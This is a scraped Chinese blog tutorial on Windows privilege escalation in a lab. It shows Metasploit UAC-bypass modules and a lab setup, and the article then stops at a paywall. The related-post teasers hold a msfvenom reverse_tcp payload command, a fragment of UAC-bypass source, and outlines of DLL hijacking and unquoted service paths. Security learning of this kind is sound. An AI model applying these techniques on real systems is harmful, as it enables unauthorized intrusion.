内网渗透第四天!!!冲冲冲!!怎么绕过uac以及你会dll劫持???不安全的服务路径以及服务权限,你会吗???

原创 已于 2024-07-05 18:59:10 修改 · 1.2k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #学习 #web安全 #网络安全 #权限提升 #黑客 #内网渗透

于 2024-07-02 22:38:43 首次发布

在第三天我们简单的说了一下绕过uac,但是我们使用的msf模块ask要对方管理员跟我们一起来进行操作,才可以进行提权的操作,这点就限制住了我们。我们今天来讲一下不用钓鱼的绕过的操作。

绕过uac:

使用uacme项目和msf联动来进行绕过,项目绕过的模块更多。

要使用vs studio进行编译才可以使用。下面主要演示的使用msf内置模块进行绕过的操作。

我们不一定要使用msf的ask模块,因为它实现的要求比较的严格了,msf里面内置了比较的多的模块,我们下面可以使用下面的2种模块来进行绕过的操作:

use exploit/windows/local/bypassuac_sluihijack

use exploit/windows/local/bypassuac_silentcleanup

然后我们来看看我本地实现的例子:还是win10 IP 192.168.163.135

然后kail  ip  192.168.163.131

前面的生成木马我们就不演示了,然后我们这个情况是在取得了webshell权限的,或者取得了对方的普通用户的权限的情况下,进行的权限提升操作。

 

这里开启了监听的功能,然后我们在等待上线。然后我们在看看现在是什么权限

然后我们在直接使用提权看看可以不???

最低0.47元/天 解锁文章
49-2 内网渗透 - 使用UACME Bypass UAC
weixin_43263566的博客
06-25 290
注意:这里是手动上传木马,如果是实际环境中需要用UAC这种方式提权,就需要通过钓鱼的手段上传,能通过文件上传漏洞之类的。这里就是假设通过钓鱼的方式上传木马到目标服务器并且运行了,kali的msf能拿到会话了。到此就提权成功了,需要注意的是这种方式的提权只能通过钓鱼的方式上线的木马才能成功。因为我们知道那个编号能让我们成功上线,那我们就将1-70全部执行一遍。回到我们之前拿到目标服务的msf会话中执行命令。尝试使用当前的管理员权限是否能够添加新用户。回到有目标服务器会话的终端,上传木马。
操作系统权限提升(十七)之绕过UAC提权-Windows令牌概述和令牌窃取攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-27 873
令牌(Token)是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动令牌最大的特点就是随机性,可预测,一般黑客或软件无法猜测出来,令牌有很多种访问令牌(Access Token)表示访问控制操作主题的系统对象会话令牌(Session Token) :是交互会话中唯一的身份标识符,可以理解为web中的token。
Win7下绕过UAC代码
12-07
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); void RefreshProcs(HWND hWnd); int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) { g_hInstance = hInstance; UNREFERENCED_PARAMETER(hPrevInstance); UNREFERENCED_PARAMETER(lpCmdLine); // Init base Windows services etc. { INITCOMMONCONTROLSEX icce = {0}; icce.dwSize = sizeof(icce); icce.dwICC = ICC_STANDARD_CLASSES; if (!InitCommonControlsEx(&icce)) { MessageBox(NULL, L"InitCommonControlsEx failed", L"Win7Elevate", MB_OK | MB_ICONERROR); return 0; }
64位下绕过UAC源代码
04-28
64位下绕过UAC源代码,32位下可以自己调整工程设置
绕过UAC提权
谢公子的博客
02-14 8582
UAC UAC(User Account Control,用户账号控制)是微软为了提高系统安全性在Windows Vista中引入的技术。UAC要求用户在执行可能影响计算机运行的操作或在进行可能影响其他用户的设置之前,拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证,以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行更改。在Windows Vi...
可以绕过 Windows UAC
langshanglibie的专栏
01-31 2078
Windows 系统安全机制并非固若金汤。通过 COM 提升名称方法,程序可以绕过其核心安全机制 UAC 而获取到系统管理员权限
红队内网攻防渗透内网渗透内网对抗:Windows权限提升篇&UAC绕过&DLL劫持&未引号路径&可控服务&全检项目
HACKONE的博客
06-17 345
原理:Windows程序启动的时候需要DLL。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。检测:火绒剑 利用火绒剑进行进程分析加载DLLDLL文件要在软件自身的目录里,这里使用进程查看工具发现了两个自身目录的dll。但是如果路径是有空格的 且没有双引号,程序会认为第一个空格处是程序自身,后面的其他空格代表程序的参数。过程:信息收集-进程调试-制作dll并上传-替换dll-等待启动应用成功。过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功。
第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
qq_46081990的博客
06-22 533
【代码】第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
49-1 内网渗透 - Bypass UAC介绍
weixin_43263566的博客
06-24 237
在实际渗透测试中,如果测试人员能够绕过UAC机制,他们可以使非RID 500的管理员账户直接使用管理员访问令牌,而无需用户的明确批准。这种绕过是真正的提权,因为并未增加用户的权限级别,而是利用漏洞或技术手段绕过UAC的确认提示,获取了管理员权限。需要注意的是,UAC本身是一种权限保护机制,而Bypass UAC只是一种绕过这一保护的技术手段,会实质性地增加用户的权限级别。(除了内置的Administrator账户),当他们登录时,系统会为其分配两个访问令牌:标准用户访问令牌和管理员访问令牌。
UAC绕过
weixin_67840381的博客
12-06 1167
UAC(用户账户控制)是微软自windows7以及后续windows系统中引入的一种访问控制功能(之后几乎所有Windows版本都包含了UAC)。UAC的主要目的是确保应用程序只限于标准用户权限,当需要其他权限时,会弹框提示询问 “是否允许以下程序对此计算机进行更改?”,举个小例子,当我们每次安装新软件的时候,都会弹出一个对话框,询问我们是否允许此程序对计算机进行更改。
关于父进程和子进程的关系(UAC 绕过思路)
weixin_34288121的博客
04-14 1022
      表面上看。在windows中。假设是a进程创建了b进程,那么a进程就是b进程的父进程。反之,假设是b创建了a,那么b进程就是a的父进程,这是在windows出现以来一直是程序员们都证实的,可是在在win Vista后面有了一个新安全消息机制。UAC(user account control),这里科普下UAC的功能,事实上UAC就是大家常见的安装软件或者启动程序的时候的出现的全...
BypassUAC------利用PowerShell绕过UAC
moonhillcity的博客
10-20 4820
转自:http://www.freebuf.com/articles/system/81286.html 背景介绍 UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。通过在这些操作启动前对其进行验证,U
BypassUAC------巧用COM接口IARPUninstallStringLauncher绕过UAC
moonhillcity的博客
10-20 948
参考freebuf文章: http://www.freebuf.com/articles/system/116611.html
matesploit提权绕过UAC
简单查找漏洞
10-17 783
学习matesploit的过程,遇到很多问题,一些问题花了好长时间,看了许多的大佬的文章才得到解决,唯恐以后自己忘记,同时希望有遇到同样问题的朋友碰巧看到而得到解决。(大佬搬运工) 1 启动postgresql数据库,然后启动msf 2 制作windows后门payload,msfvenom -p windows/meterpreter/reverse_tcp lhost=本机ip lport...
11月1日笔记(UAC绕过)
m0_74736832的博客
11-01 796
用户账户控制(User Account Control,UAC)是 Windows 操作系统采用的一种控制机制,可以阻止自动安装未经授权的应用并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授予管理员级别的权限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须提示征得用户同意.当非 RID 500的管理员用户登录后,系统会为其创建两个单独的访问令牌:标准用户访问令牌和管理员访问令牌。
Windows 提权-UAC 绕过
最新发布
weixin_55010563的博客
03-03 851
注:低/中/高完整性 shell 之间的区别,以图形化界面用户启动 cmd.exe 程序为例,普通用户直接启动就算作是低完整性 shell 吧,管理员组的用户直接启动为中完整性 shell,管理员组的用户右键“以管理员身份运行”启动为高完整性 shell。似乎只有管理员组的账户才有这种在身份变的情况下 shell 权限能由中转高完整性的说法,而以普通用户和系统用户得到的 shell 一般就已经是其自身身份的完整权限了,过具有 SeBackupPrivilege 特权的普通域用户好像例外,如此例。
UAC学习之路
weixin_42282189的博客
12-31 862
作者: Crlt_TT豆 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 什么是uacUAC 用于允许管理员用户对每个执行的进程授予管理员权限这是作为管理员UAC提升执行,如果成功完成,特权令牌用于创建进程。 这里为了区分低权限权限的进程,微软使用了强制性完整性控制MIC MIC介绍 查看自己当前的完整性级别 whoami /groups 接下来我们以该级别创建一个文件 现在我们以管理员cmd给予test.txt最高的系统权限 可以看见我们对该文件是有.
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值